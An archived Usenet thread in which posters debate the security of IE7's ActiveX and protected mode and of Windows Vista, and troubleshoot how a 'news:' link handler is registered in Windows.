zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Volker Birk wrote:

> Unless IE stops supporting ActiveX and thus supporting manipulating
> arbitrary COM objects, it's a security nightmare and not "the most
> secure browser".
>
> ActiveX is a design flaw, and never can be fixed.
>
> Yours,
> VB.

I use FF with noscipt but nothing can compromise the OS by running IE7
because it runs in protected memory space.

Rat River Cemetary wrote:


> I use FF with noscipt but nothing can compromise the OS by running IE7
> because it runs in protected memory space.


Unless you simply break out of it, which is trivial.

Rat River Cemetary <dead@rat.here> wrote:
> Volker Birk wrote:
>> Unless IE stops supporting ActiveX and thus supporting manipulating
>> arbitrary COM objects, it's a security nightmare and not "the most
>> secure browser".
>> ActiveX is a design flaw, and never can be fixed.
> I use FF with noscipt but nothing can compromise the OS by running IE7
> because it runs in protected memory space.

That's wrong.

COM offers the possibility for IPC (DCOM, COM+).

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Sebastian G. wrote:
> Q wrote:
>
>> Sebastian G. wrote:
>>
>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>
>> Is that your email address and news should be mail?
>
>
> No, it's a reference to one of my postings in this thread. Is your
> newsreader that defective?
>
thunderbird doesn't understand it as well

goarilla@work wrote:

> Sebastian G. wrote:
>> Q wrote:
>>
>>> Sebastian G. wrote:
>>>
>>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>> Is that your email address and news should be mail?
>>
>> No, it's a reference to one of my postings in this thread. Is your
>> newsreader that defective?
>>
> thunderbird doesn't understand it as well


Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
"news:" is broken?

Sebastian G. wrote:

> Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
> "news:" is broken?

I use portable Thunderbird for news so it is not registered in the
registry as my news reader. When I clicked your link Microsoft Mail
tried to open it because that is what is registered on my system for
news but I only use that for Mail and not news. You should not assume
everyone has their PC configured the same as you.

Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
>> "news:" is broken?
>
> I use portable Thunderbird for news so it is not registered in the
> registry as my news reader. When I clicked your link Microsoft Mail
> tried to open it because that is what is registered on my system for
> news but I only use that for Mail and not news. You should not assume
> everyone has their PC configured the same as you.


Now it's my fault that you didn't set it up properly... "news:" is one of
the few well known protocol handlers which one may safely assume to be working.

Even further, it's the standard way of referencing Usenet postings. Even
further, there simply is no other.

goarilla <"kevin<punt>paulus|"@|skynet punt> wrote:
> Sebastian G. wrote:
>> quodnomentibi@remailed.ws wrote:
>>
>>
>>> I just got a new laptop a few days ago, running Vista Home Premium.
>>> I am
>>> in the midst of "customizing" it. Presently, I am running the Microsoft
>>> Firewall. Is this an act of blind faith on my part.
>>
>>
>> Yes. Windows Vista is trivially insecure.


Personally I think a hardware firewall is well worth having. Mine only
allows out the ports I want, and some like lookups to DNS servers and
time servers are only allowed to certain IP addresses.

I don't know how insecure Vista is (Ive personally not been knowingly
hacked), but I do agree it is a poor operating system. I had Vista
Business supplied on my high end laptop, then payed for an upgrade to
Vista Ultimate. I've since repartitioned the disk to Solaris x86, but
I'm going to fit a larger disk (300 GB from 120 GB), and then partition
as XP and Solaris x86.

So despite having Vista Ultimate, on a laptop which costs about $3200
only 13 months ago (dual core 2 GHz, 2 GB RAM), I have come to the
conclusion it requires too much resources from my high-end laptop.

You really should try Solaris x86 and see how snappy a machine feels
compares to one running Vista. I've not managed to get drivers for
either the camera or the fingerprint reader, but those are minor
irritations compared to the slowness of Vista and the fact many programs
have issues when running under Vista.

Dave wrote:


> You really should try Solaris x86 and see how snappy a machine feels
> compares to one running Vista. I've not managed to get drivers for
> either the camera or the fingerprint reader, but those are minor
> irritations compared to the slowness of Vista and the fact many programs
> have issues when running under Vista.


This fact is, sadly, well documented. With Windows 2000 Microsoft decided on
a subset of he Win32 API known as NT5 API, which they guaranteed to keep
consistent on all Windows versions till at least 2012, and strongly advised
all newly developed programs to restrict themselves to this subset for the
sake of forward and backward compatibility. Now with Vista they've already
broken this promise, f.e. they've removed the ShellItemIDList stuff and
fully replaced it with Windows Search 4.0 Item Containers (and didn't even
offer a marshaller stub, which would be trivial to implement).

Sebastian G. wrote:
> goarilla@work wrote:
>
>> Sebastian G. wrote:
>>> Q wrote:
>>>
>>>> Sebastian G. wrote:
>>>>
>>>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>>> Is that your email address and news should be mail?
>>>
>>> No, it's a reference to one of my postings in this thread. Is your
>>> newsreader that defective?
>>>
>> thunderbird doesn't understand it as well
>
>
> Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
> "news:" is broken?

maybe ... but well ...
how do i check ?

tried looking in HKCR\... for news:/
but damn
i miss mailcap ?

goarilla@work wrote:


>>> thunderbird doesn't understand it as well
>>
>> Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
>> "news:" is broken?
>
> maybe ... but well ...
> how do i check ?
>
> tried looking in HKCR\... for news:/
> but damn
> i miss mailcap ?


On Windows it should be HKCR\news, entitled as "URL:News Protocol" and "URL
Protocol", and the "open" shell verb gives the handler.

However, it is well known that both Thunderbird and Mozilla Mail don't set
this properly when installed and running without admin privileges, so you
have to do it manually.